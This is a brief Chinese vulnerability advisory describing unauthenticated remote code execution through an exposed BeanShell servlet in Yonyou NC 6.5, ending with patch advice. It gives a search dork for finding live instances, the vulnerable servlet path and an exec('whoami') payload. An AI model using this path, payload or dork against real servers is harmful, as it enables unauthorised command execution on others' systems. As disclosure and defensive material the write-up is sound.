作者:蚂蚁@Timeline Sec
本文字数:361
阅读时长:2~3min
声明:请勿用作违法用途,否则后果自负
0x01 简介
用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。
0x02 漏洞概述
用友NC由于对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码从而获取服务器权限。
0x03 影响版本
用友NC6.5版本
0x04 环境搭建
国外在线环境
代码语言:javascript复制title=="YONYOU NC" && country="SG"
0x05 漏洞复现
1、访问
/servlet/~ic/bsh.servlet.BshServlet
得到如图:
2、我们发现这里有执行代码的接口我们输入payload如:exec("whoami");即可看到命令执行成功
0x06 修复方式
该漏洞为第三方jar包漏洞导致,用友NC官方已发布安全补丁,建议使用该产品的用户及时安装该漏洞补丁包。
补丁下载链接:
代码语言:javascript复制http://umc.yonyou.com/ump/querypatchdetailedmng? PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19
